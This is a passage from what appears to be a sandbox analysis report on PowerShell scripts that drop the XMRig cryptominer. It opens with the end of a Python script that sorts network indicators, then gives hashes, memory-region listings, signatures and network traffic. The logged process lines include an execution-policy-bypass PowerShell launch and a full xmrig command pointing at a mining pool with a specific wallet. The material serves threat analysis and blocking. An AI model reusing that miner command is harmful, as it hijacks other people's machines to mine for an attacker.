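        if not port.isdigit():
            continue   # header row or a destination without a port
        rows.append({"cc": parts[0], "ip": ip, "port": int(port),
                     "domain": parts[2] if len(parts) == 4 else None,
                     "proto": parts[-1].lower()})
    return rows


def _matches(domain, suffixes):
    return domain is not None and any(domain == s or domain.endswith("." + s) for s in suffixes)


def classify(row):
    """Label one row; PTR lookups are reverse-resolutions of peers, not sample behaviour."""
    d = row["domain"]
    if d and d.endswith(".in-addr.arpa"):
        return "ptr-lookup"
    if row["port"] == 53 and row["proto"] == "udp":
        return "dns-query"
    if _matches(d, POOL_SUFFIXES):
        return "mining-pool"
    if _matches(d, STAGING_SUFFIXES):
        return "payload-staging"
    if _matches(d, BACKGROUND_SUFFIXES):
        return "background"
    if d is None:
        return "unattributed"
    return "other"


def triage(rows):
    """Bucket rows into IOC lists; PTR noise is dropped, DNS queries keep only the name."""
    out = {"dns_queries": [], "mining_pool": [], "payload_staging": [],
           "background": [], "unattributed": [], "other": []}
    for r in rows:
        kind = classify(r)
        if kind == "ptr-lookup":
            continue
        if kind == "dns-query":
            out["dns_queries"].append(r["domain"])
        else:
            out[kind.replace("-", "_")].append((r["domain"], r["ip"], r["port"]))
    return out


if __name__ == "__main__":
    for bucket, items in triage(parse_rows(SAMPLE_ROWS)).items():
        print(bucket, items)
```

The `unattributed` bucket is where the domain-less 52.111.227.11:443 rows from the later detonations land; treat those as "needs attribution" rather than as pool traffic, since nothing in the report ties them to the miner. The `mining_pool` tuple (name, IP, port) is the IOC to block at the resolver or TLS-inspection layer, not the port.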

Files

memory/5072-0-0x00007FFE30513000-0x00007FFE30515000-memory.dmp

memory/5072-1-0x0000028978D20000-0x0000028978D42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_friwu2wc.brw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5072-11-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/5072-12-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/5072-14-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/5072-15-0x0000028979A00000-0x0000028979A12000-memory.dmp

memory/5072-16-0x0000028978D10000-0x0000028978D1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4396-47-0x000001FC537E0000-0x000001FC53800000-memory.dmp

memory/4396-48-0x000001FC550E0000-0x000001FC55100000-memory.dmp

memory/4396-49-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/5072-50-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/4396-52-0x000001FC55100000-0x000001FC55120000-memory.dmp

memory/5072-51-0x00007FFE30513000-0x00007FFE30515000-memory.dmp

memory/4396-53-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-55-0x000001FC55120000-0x000001FC55140000-memory.dmp

memory/5072-54-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/5072-56-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/4396-57-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-59-0x000001FC55100000-0x000001FC55120000-memory.dmp

memory/4396-58-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-60-0x000001FC55120000-0x000001FC55140000-memory.dmp

memory/4396-61-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-62-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-63-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-64-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-65-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-66-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-67-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-68-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-69-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-70-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-71-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-72-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-73-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-74-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-75-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-76-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-77-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-78-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-79-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-80-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-81-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-82-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-83-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-84-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-85-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-86-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-87-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-88-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-89-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-90-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-91-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-92-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-93-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-94-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-95-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-96-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-97-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-98-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-99-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-100-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-101-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-102-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-103-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-104-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-105-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-106-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-107-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-108-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-109-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-110-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-111-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-112-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-113-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-114-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-115-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-116-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-117-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-118-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

memory/4396-119-0x00007FF620FF0000-0x00007FF621C23000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:49

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1791s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 matches; the report records no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 52.111.227.11:443 (no domain recorded) tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

memory/2692-0-0x00007FFBF81B3000-0x00007FFBF81B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mi0j4lp2.zz0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2692-10-0x000001E64ADD0000-0x000001E64ADF2000-memory.dmp

memory/2692-11-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/2692-12-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/2692-14-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/2692-15-0x000001E64BB30000-0x000001E64BB42000-memory.dmp

memory/2692-16-0x000001E64ADC0000-0x000001E64ADCA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4856-47-0x000001AE6D8A0000-0x000001AE6D8C0000-memory.dmp

memory/4856-48-0x000001AE6D8E0000-0x000001AE6D900000-memory.dmp

memory/4856-49-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/2692-51-0x00007FFBF81B3000-0x00007FFBF81B5000-memory.dmp

memory/4856-50-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/2692-52-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/4856-54-0x000001AF004C0000-0x000001AF004E0000-memory.dmp

memory/4856-53-0x000001AE6D900000-0x000001AE6D920000-memory.dmp

memory/4856-55-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/2692-56-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

memory/4856-57-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-58-0x000001AE6D900000-0x000001AE6D920000-memory.dmp

memory/4856-59-0x000001AF004C0000-0x000001AF004E0000-memory.dmp

memory/4856-60-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-61-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-62-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-63-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-64-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-65-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-66-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-67-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-68-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-69-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-70-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-71-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-72-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-73-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-74-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-75-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-76-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-77-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-78-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-79-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-80-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-81-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-82-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-83-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-84-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-85-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-86-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-87-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-88-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-89-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-90-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-91-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-92-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-93-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-94-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-95-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-96-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-97-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-98-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-99-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-100-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-101-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-102-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-103-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-104-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-105-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-106-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-107-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-108-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-109-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-110-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-111-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-112-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-113-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-114-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-115-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-116-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-117-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

memory/4856-118-0x00007FF656EC0000-0x00007FF657AF3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:58

Platform

win11-20240426-en

Max time kernel

1792s

Max time network

1777s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 matches; the report records no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.11:443 (no domain recorded) tcp

Files

memory/2568-0-0x00007FFDFF433000-0x00007FFDFF435000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vu5d1djc.mgb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2568-9-0x0000026B3AFD0000-0x0000026B3AFF2000-memory.dmp

memory/2568-10-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp

memory/2568-11-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp

memory/2568-12-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp

memory/2568-14-0x0000026B3B030000-0x0000026B3B042000-memory.dmp

memory/2568-15-0x0000026B3B020000-0x0000026B3B02A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3816-46-0x0000021416FF0000-0x0000021417010000-memory.dmp

memory/3816-47-0x0000021417050000-0x0000021417070000-memory.dmp

memory/3816-48-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/2568-49-0x00007FFDFF433000-0x00007FFDFF435000-memory.dmp

memory/2568-50-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp

memory/3816-53-0x0000021417070000-0x0000021417090000-memory.dmp

memory/2568-52-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp

memory/3816-51-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-54-0x0000021417090000-0x00000214170B0000-memory.dmp

memory/3816-55-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-56-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-57-0x0000021417070000-0x0000021417090000-memory.dmp

memory/3816-58-0x0000021417090000-0x00000214170B0000-memory.dmp

memory/3816-59-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-60-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-61-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-62-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-63-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-64-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-65-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-66-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-67-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-68-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-69-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-70-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-71-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-72-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-73-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-74-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-75-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-76-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-77-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-78-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-79-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-80-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-81-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-82-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-83-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-84-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-85-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-86-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-87-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-88-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-89-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-90-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-91-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-92-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-93-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-94-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-95-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-96-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-97-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-98-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-99-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-100-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-101-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-102-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-103-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-104-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-105-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-106-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-107-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-108-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-109-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-110-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-111-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-112-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-113-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-114-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-115-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-116-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

memory/3816-117-0x00007FF6E8C40000-0x00007FF6E9873000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:26

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(64 identical rows in the original: the rule matched 64 times, and the report records no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
